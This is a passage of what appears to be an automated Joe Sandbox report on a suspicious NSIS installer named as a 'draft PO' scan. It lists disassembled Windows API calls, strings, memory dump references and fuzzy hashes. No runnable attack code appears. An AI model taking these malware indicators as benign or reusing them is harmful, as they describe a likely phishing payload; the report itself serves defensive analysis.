                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                • MulDiv.KERNEL32(00134FEE,00000064,00136240), ref: 00402E3C
                                                                                • wsprintfW.USER32 ref: 00402E4C
                                                                                • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                Strings
                                                                                • verifying installer: %d%%, xrefs: 00402E46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: verifying installer: %d%%
                                                                                • API String ID: 1451636040-82062127
                                                                                • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                                • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405811
                                                                                • GetLastError.KERNEL32 ref: 00405825
                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                                • GetLastError.KERNEL32 ref: 00405844
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                • String ID: C:\Users\user\Desktop
                                                                                • API String ID: 3449924974-1246513382
                                                                                • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                                • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
                                                                                APIs
                                                                                • CharNextW.USER32(?,?,Designlisters\Muggish.fje,?,00405C8B,Designlisters\Muggish.fje,Designlisters\Muggish.fje,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                                                                • CharNextW.USER32(00000000), ref: 00405C2A
                                                                                • CharNextW.USER32(00000000), ref: 00405C42
                                                                                Strings
                                                                                • Designlisters\Muggish.fje, xrefs: 00405C18
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext
                                                                                • String ID: Designlisters\Muggish.fje
                                                                                • API String ID: 3213498283-2926771119
                                                                                • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                                • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                                • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 2659869361-823278215
                                                                                • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                                • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                • String ID:
                                                                                • API String ID: 2102729457-0
                                                                                • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                                • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                                APIs
                                                                                  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(?,?,Designlisters\Muggish.fje,?,00405C8B,Designlisters\Muggish.fje,Designlisters\Muggish.fje,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                • lstrlenW.KERNEL32(Designlisters\Muggish.fje,00000000,Designlisters\Muggish.fje,Designlisters\Muggish.fje,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405CCD
                                                                                • GetFileAttributesW.KERNEL32(Designlisters\Muggish.fje,Designlisters\Muggish.fje,Designlisters\Muggish.fje,Designlisters\Muggish.fje,Designlisters\Muggish.fje,Designlisters\Muggish.fje,00000000,Designlisters\Muggish.fje,Designlisters\Muggish.fje,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405CDD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                • String ID: Designlisters\Muggish.fje
                                                                                • API String ID: 3248276644-2926771119
                                                                                • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                                • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                                APIs
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063D9,80000002), ref: 004061AB
                                                                                • RegCloseKey.ADVAPI32(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 004061B6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CloseQueryValue
                                                                                • String ID: Call
                                                                                • API String ID: 3356406503-1824292864
                                                                                • Opcode ID: 2aedf4034f5939cf2c1fa7a7ce567a5c7d94ff0f9284307de94c74370a219c96
                                                                                • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                                • Opcode Fuzzy Hash: 2aedf4034f5939cf2c1fa7a7ce567a5c7d94ff0f9284307de94c74370a219c96
                                                                                • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                                • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                                Strings
                                                                                • Error launching installer, xrefs: 00405893
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                                • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                                • GlobalFree.KERNEL32(00B50B60), ref: 00403913
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
